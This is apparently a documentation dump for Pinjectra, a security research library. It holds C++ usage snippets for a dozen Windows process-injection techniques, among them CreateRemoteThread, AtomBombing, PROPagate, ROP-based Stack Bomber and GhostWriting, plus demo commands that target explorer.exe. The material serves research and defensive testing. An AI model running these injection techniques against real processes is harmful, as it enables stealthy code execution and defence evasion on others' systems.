### DLL Injection via Windows Hook (C++) Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Injects a DLL into a target process using the SetWindowsHookEx mechanism. This example uses LoadLibraryA and GetProcAddress to load and execute the DLL. ```cpp #include "WindowsHook.h" #include "LLA_GPA.h" ExecutionTechnique* executor = new LoadDLLViaWindowsHook( new LoadLibraryA_GetProcAddress("MsgBoxOnGetMsgProc.dll", "GetMsgProc") ); executor->inject(pid, tid); ``` -------------------------------- ### LoadLibraryA_GetProcAddress: Provide hook procedure by loading DLL and getting function address Source: https://context7.com/safebreach-labs/pinjectra/llms.txt This method provides a hook procedure by loading a specified DLL and retrieving the address of an exported function using LoadLibraryA and GetProcAddress. It returns a RUNTIME_PROC_ENTRY containing the function pointer. ```cpp #include "LLA_GPA.h" HookProcProvider* provider = new LoadLibraryA_GetProcAddress( "MsgBoxOnGetMsgProc.dll", // DLL filename "GetMsgProc" // Export function name ); RUNTIME_PROC_ENTRY* entry = provider->provide(); ``` -------------------------------- ### Pinjector Demo Application Usage in Bash Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Demonstrates the usage of the Pinjector command-line demo application for testing various injection techniques. The application takes a DEMO_ID, PID, and TID as arguments. ```bash # Usage Pinjector.exe # Demo 1: WindowsHook + LoadLibraryA_GetProcAddress Pinjector.exe 1 1234 5678 # Demo 2: CreateRemoteThread + DLL Load Pinjector.exe 2 1234 5678 # Demo 3: CreateRemoteThread + Code Injection with File Mapping Pinjector.exe 3 1234 5678 # Demo 4: SIR (Thread Execution Hijacking) Pinjector.exe 4 1234 5678 # Demo 5: QueueUserAPC + AtomBombing Pinjector.exe 5 1234 5678 # Demo 6: CtrlInject Pinjector.exe 6 1234 5678 # Demo 7: ALPC (use explorer.exe PID) Pinjector.exe 7 1234 5678 # Demo 8: PROPagate Pinjector.exe 8 1234 5678 # Demo 9: Stack Bomber (requires alertable thread) Pinjector.exe 9 1234 5678 # Demo 10: SetWindowLongPtrA Pinjector.exe 10 1234 5678 # Demo 11: SIR + GhostWriting (requires alertable thread) Pinjector.exe 11 1234 5678 # Demo 12: Unmap/Map (use explorer.exe PID) Pinjector.exe 12 1234 5678 ``` -------------------------------- ### C++ CreateRemoteThread Demo with DLL Load Source: https://github.com/safebreach-labs/pinjectra/blob/master/README.md Demonstrates using Pinjectra's CodeViaCreateRemoteThread to inject a DLL into a target process. It utilizes OpenProcess, VirtualAllocEx, and WriteProcessMemory for memory allocation and writing, setting the DLL's entry point to LoadLibraryA. Requires necessary process access rights. ```cpp CodeViaCreateRemoteThread* executor; executor = new CodeViaCreateRemoteThread( new OpenProcess_VirtualAllocEx_WriteProcessMemory( (void *)"MsgBoxOnProcessAttach.dll", 25, PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE), LoadLibraryA ); executor->inject(pid, tid); ``` -------------------------------- ### Code Injection via CreateRemoteThread (C++) Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Demonstrates DLL injection using LoadLibraryA and code injection using file mapping via CreateRemoteThread. It utilizes OpenProcess, VirtualAllocEx, and WriteProcessMemory. ```cpp #include "CreateRemoteThread.h" #include "OP_VAE_WPM.h" // DLL injection using LoadLibraryA as entry point ExecutionTechnique* executor = new CodeViaCreateRemoteThread( new OpenProcess_VirtualAllocEx_WriteProcessMemory( (void*)"MsgBoxOnProcessAttach.dll", 25, PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE), LoadLibraryA ); executor->inject(pid, tid); // Code injection with file mapping ExecutionTechnique* executor2 = new CodeViaCreateRemoteThread( new CreateFileMappingA_MapViewOfFile_OpenProcess_PNtMapViewOfSection( _gen_payload_2(), PAYLOAD2_SIZE ) ); executor2->inject(pid, tid); ``` -------------------------------- ### Stack Bomber: Execute ROP chain using NtQueueApcThread and memset Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Implements the "Stack Bomber" technique for Windows 10 64-bit with CFG and CIG enabled. It uses NtQueueApcThread with memset for ROP chain execution, requiring the target thread to be in an alertable state. ```cpp #include "SIR.h" #include "NQAT_WITH_MEMSET.h" #include "DynamicPayloads.h" // Requires target thread to be in alertable state ExecutionTechnique* executor = new CodeViaThreadSuspendInjectAndResume_Complex( new NtQueueApcThread_WITH_memset( new _ROP_CHAIN_1() ) ); executor->inject(pid, tid); ``` -------------------------------- ### CodeViaALPC: Inject code using ALPC callback mechanisms Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Injects code using ALPC (Advanced Local Procedure Call) callback mechanisms. This technique is best suited for processes that utilize ALPC ports, such as explorer.exe. It relies on VirtualAllocEx and WriteProcessMemory. ```cpp #include "ALPC.h" #include "VAE_WPM.h" ExecutionTechnique* executor = new CodeViaALPC( new VirtualAllocEx_WriteProcessMemory( _gen_payload_3(), PAYLOAD3_SIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE) ); // Use explorer.exe PID for best results executor->inject(explorer_pid, tid); ``` -------------------------------- ### Evaluate Dynamic Payloads in C++ Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Evaluates dynamic payloads at runtime using substitution parameters. These payloads are instantiated as DynamicPayload objects and their 'eval' method is called with a parameter map. ```cpp #include "DynamicPayloads.h" // PAYLOAD_4 - Dynamic payload for SetWindowLongPtrA (75 bytes) DynamicPayload* payload4 = new _PAYLOAD_4(); TStrDWORD64Map params; PINJECTRA_PACKET* packet = payload4->eval(params); // PAYLOAD_5 - Dynamic payload for Unmap/Map technique (107 bytes) DynamicPayload* payload5 = new _PAYLOAD_5(); PINJECTRA_PACKET* packet = payload5->eval(params); // ROP_CHAIN_1 - For Stack Bomber technique DynamicPayload* rop1 = new _ROP_CHAIN_1(); PINJECTRA_PACKET* packet = rop1->eval(params); // ROP_CHAIN_2 - For GhostWriting technique DynamicPayload* rop2 = new _ROP_CHAIN_2(); PINJECTRA_PACKET* packet = rop2->eval(params); ``` -------------------------------- ### CodeViaCtrlInject: Inject code using Ctrl handler hijacking Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Injects code by hijacking the Ctrl handler mechanism in console applications. It utilizes OpenProcess, VirtualAllocEx, and WriteProcessMemory for payload delivery. ```cpp #include "CtrlInject.h" #include "OP_VAE_WPM.h" ExecutionTechnique* executor = new CodeViaCtrlInject( new OpenProcess_VirtualAllocEx_WriteProcessMemory( _gen_payload_2(), PAYLOAD3_SIZE, PROCESS_VM_WRITE | PROCESS_VM_OPERATION, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) ); executor->inject(pid, tid); ``` -------------------------------- ### Code Injection via QueueUserAPC and AtomBombing (C++) Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Injects code using the QueueUserAPC mechanism combined with the AtomBombing technique. This method requires the target thread to be in an alertable state and uses GlobalAddAtomA. ```cpp #include "QueueUserAPC.h" #include "OT_OP_VAE_GAAA.h" ExecutionTechnique* executor = new CodeViaQueueUserAPC( new OpenThread_OpenProcess_VirtualAllocEx_GlobalAddAtomA( _gen_payload_2(), PAYLOAD3_SIZE, PROCESS_ALL_ACCESS, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE) ); executor->inject(pid, tid); ``` -------------------------------- ### Generate Static Payloads in C++ Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Generates pre-defined static payloads for demonstration and testing purposes. These functions are declared in 'StaticPayloads.h' and return character pointers to the generated payloads. ```cpp extern "C" { #include "StaticPayloads.h" } // Generate payload 1 (71 bytes) - for SIR technique char* payload1 = _gen_payload_1(); // Generate payload 2 (70 bytes) - general purpose char* payload2 = _gen_payload_2(); // Generate payload 3 (75 bytes) - for ALPC technique char* payload3 = _gen_payload_3(); ``` -------------------------------- ### CodeViaPROPagate: Inject code abusing subclass callback properties Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Injects code using the PROPagate technique, which abuses subclass callback properties. This method is particularly effective against explorer.exe and uses VirtualAllocEx and WriteProcessMemory. ```cpp #include "PROPagate.h" #include "VAE_WPM.h" ExecutionTechnique* executor = new CodeViaPROPagate( new VirtualAllocEx_WriteProcessMemory( _gen_payload_2(), PAYLOAD2_SIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE) ); executor->inject(pid, tid); ``` -------------------------------- ### VirtualAllocEx_WriteProcessMemory: Memory writing with existing process handle Source: https://context7.com/safebreach-labs/pinjectra/llms.txt This memory writing technique is designed for situations where a process handle is already available. It utilizes VirtualAllocEx and WriteProcessMemory, allowing for the specification of allocation type and memory protection. ```cpp #include "VAE_WPM.h" AdvanceMemoryWriter* writer = new VirtualAllocEx_WriteProcessMemory( payload_buffer, payload_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); RUNTIME_MEM_ENTRY* result = writer->writeto(process_handle, additional_space); ``` -------------------------------- ### Unmap/Map Technique: Process injection via NtUnmapViewOfSection and NtMapViewOfSection Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Performs process injection by utilizing NtUnmapViewOfSection and NtMapViewOfSection for memory manipulation. This technique is best applied against processes like explorer.exe and involves suspending and resuming the target thread. ```cpp #include "SIR.h" #include "CFMA_MVOF_NUVOS_NMVOS.h" #include "DynamicPayloads.h" // Best used against explorer.exe ExecutionTechnique* executor = new CodeViaProcessSuspendInjectAndResume_Complex( new CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection( new _PAYLOAD_5() ) ); executor->inject(explorer_pid, tid); ``` -------------------------------- ### Define ExecutionTechnique Base Class (C++) Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Defines the abstract base class for all execution techniques in Pinjectra. It specifies a common injection interface that requires a target process ID and thread ID. ```cpp #include class ExecutionTechnique { public: virtual boolean inject(DWORD pid, DWORD tid) = 0; }; ``` -------------------------------- ### Thread Execution Hijacking via SIR (C++) Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Implements thread execution hijacking by suspending a thread, modifying its context, and resuming execution with injected code. It uses OpenProcess, VirtualAllocEx, and WriteProcessMemory for memory operations. ```cpp #include "SIR.h" #include "OP_VAE_WPM.h" ExecutionTechnique* executor = new CodeViaThreadSuspendInjectAndResume( new OpenProcess_VirtualAllocEx_WriteProcessMemory( _gen_payload_1(), PAYLOAD1_SIZE, PROCESS_VM_WRITE | PROCESS_VM_OPERATION, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) ); executor->inject(pid, tid); ``` -------------------------------- ### OpenProcess_VirtualAllocEx_WriteProcessMemory: Standard memory writing Source: https://context7.com/safebreach-labs/pinjectra/llms.txt A standard memory writing technique that uses the OpenProcess, VirtualAllocEx, and WriteProcessMemory APIs. It allows for specifying desired access, allocation type, and memory protection. ```cpp #include "OP_VAE_WPM.h" SimpleMemoryWriter* writer = new OpenProcess_VirtualAllocEx_WriteProcessMemory( payload_buffer, payload_size, PROCESS_VM_WRITE | PROCESS_VM_OPERATION, // dwDesiredAccess MEM_COMMIT | MEM_RESERVE, // flAllocationType PAGE_EXECUTE_READWRITE // flProtect ); RUNTIME_MEM_ENTRY* result = writer->write(pid, tid); ``` -------------------------------- ### GhostWriting: Write to memory without WriteProcessMemory using target threads Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Writes to target process memory without using the WriteProcessMemory API by leveraging the target's own threads. This technique also requires the target thread to be in an alertable state and uses ROP chains. ```cpp #include "SIR.h" #include "GhostWriting.h" #include "DynamicPayloads.h" // Requires target thread to be in alertable state ExecutionTechnique* executor = new CodeViaThreadSuspendInjectAndResume_ChangeRspChangeRip_Complex( new GhostWriting( new _ROP_CHAIN_2() ) ); executor->inject(pid, tid); ``` -------------------------------- ### Define SimpleMemoryWriter Base Class (C++) Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Abstract class for simple memory writing techniques. It defines a method to write payloads to a target process, requiring a process ID and thread ID. ```cpp typedef struct { HANDLE process; HANDLE thread; LPVOID addr; LPVOID entry_point; SIZE_T tot_write; SIZE_T tot_alloc; } RUNTIME_MEM_ENTRY; class SimpleMemoryWriter { public: virtual RUNTIME_MEM_ENTRY* write(DWORD pid, DWORD tid) = 0; }; ``` -------------------------------- ### Define AdvanceMemoryWriter Base Class (C++) Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Abstract class for advanced memory writing techniques. It provides a method to write to an already opened process handle, requiring the handle and additional memory space. ```cpp class AdvanceMemoryWriter { public: virtual RUNTIME_MEM_ENTRY* writeto(HANDLE process_handle, SIZE_T additional_mem_space) = 0; }; ``` -------------------------------- ### CodeViaSetWindowLongPtrA: Inject code by modifying window procedure pointers Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Injects code by modifying window procedure pointers using the SetWindowLongPtrA function. This technique employs a ComplexToMutableAdvanceMemoryWriter in conjunction with VirtualAllocEx and WriteProcessMemory. ```cpp #include "SetWindowLongPtrA.h" #include "VAE_WPM.h" #include "DynamicPayloads.h" ExecutionTechnique* executor = new CodeViaSetWindowLongPtrA( new ComplexToMutableAdvanceMemoryWriter( new _PAYLOAD_4(), new VirtualAllocEx_WriteProcessMemory( NULL, 0, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) ) ); executor->inject(pid, tid); ``` -------------------------------- ### Define ComplexMemoryWriter Base Class (C++) Source: https://context7.com/safebreach-labs/pinjectra/llms.txt Abstract class for complex memory writing techniques. It requires runtime parameter evaluation and takes a target process structure and a map of parameters. ```cpp class ComplexMemoryWriter { public: virtual PINJECTRA_PACKET* eval_and_write(TARGET_PROCESS* target, TStrDWORD64Map ¶ms) = 0; }; ``` -------------------------------- ### Find Explorer PID using Batch Script Source: https://context7.com/safebreach-labs/pinjectra/llms.txt A batch script to find the Process ID (PID) of the explorer.exe process. It uses the 'tasklist' command with filtering and 'findstr' to locate the relevant line. ```batch @rem PIDOF_EXPLORER.bat @rem Outputs the PID of explorer.exe tasklist /FI "IMAGENAME eq explorer.exe" /FO CSV | findstr explorer ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.